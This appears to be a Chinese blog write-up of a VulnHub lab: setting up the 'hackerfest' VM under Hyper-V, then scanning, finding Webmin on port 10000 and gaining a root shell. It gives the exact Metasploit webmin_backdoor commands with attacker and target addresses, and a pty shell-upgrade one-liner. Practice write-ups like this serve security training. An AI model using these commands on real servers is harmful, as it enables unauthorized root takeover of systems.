本周实践的是vulnhub的hackerfest镜像,下载地址,https://download.vulnhub.com/hackerfest/HF2019-Linux.zip,
下载到的压缩包解开后发现磁盘文件是vhdx,明显是个hyper-v的磁盘文件,
先尝试了转成vmdk,但是系统起不来,没办法,只能装个hyper-v了,
再用这个vhdx磁盘文件创建虚机,启动没问题,
接下来的活儿就跟以往实践的流程一致了,
首先进行地址扫描,
sudo netdiscover -r 192.168.137.0/24,这里知道192.168.137.196就是靶机地址,
然后进行端口扫描,最重要的就是10000端口,且开了ssl的webmin,
上metasploit,并且搜跟webmin有关的漏洞利用,webmin_backdoor这个就挺好,
use exploit/linux/http/webmin_backdoor
set RHOSTS 192.168.137.196
set LHOST 192.168.137.83
set SSL true
执行漏洞利用,获取到shell,id一眼,竟然直接就是root,都省的再提权了,也可以python -c 'import pty;pty.spawn("/bin/bash")'一下,转成交互式shell,干啥就都方便了,
这个实践过程很简单,只是前期搭环境费了点儿劲,尝试vhdx转vmdk,以及安装hyper-v,并用vhdx起虚机,都需要有一些实践经验,才能快速搞定靶机环境。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论